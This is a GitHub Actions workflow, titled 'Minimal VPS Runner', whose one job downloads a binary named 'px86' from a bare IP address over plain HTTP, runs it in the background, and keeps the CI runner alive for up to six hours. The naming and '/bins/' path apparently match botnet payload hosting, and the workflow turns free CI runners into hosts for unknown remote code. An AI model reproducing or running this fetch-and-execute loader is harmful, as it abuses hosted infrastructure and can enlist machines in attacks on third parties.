name: Minimal VPS Runner

on:
  workflow_dispatch:
    inputs:
      uptime:
        description: 'VPS uptime in hours (max 6)'
        required: false
        default: '6'
        type: choice
        options:
          - '1'
          - '2'
          - '3'
          - '4'
          - '5'
          - '6'

jobs:
  run-binary:
    runs-on: ubuntu-latest
    steps:
      - name: Download and run binary in background
        run: |
          echo "🔽 Downloading binary..."
          wget http://45.138.16.158/bins/px86 -O px86
          chmod +x px86
          
          echo "🚀 Running binary in background..."
          ./px86 x86 &  # Run in background
          BINARY_PID=$!
          echo "📌 Binary PID: $BINARY_PID"

          echo "⏳ Starting keep-alive mechanism..."
          (sleep $(( ${{ github.event.inputs.uptime }} * 3600 )) && kill $BINARY_PID && echo '⏱️ Uptime complete. Binary stopped.') &
          tail -f /dev/null
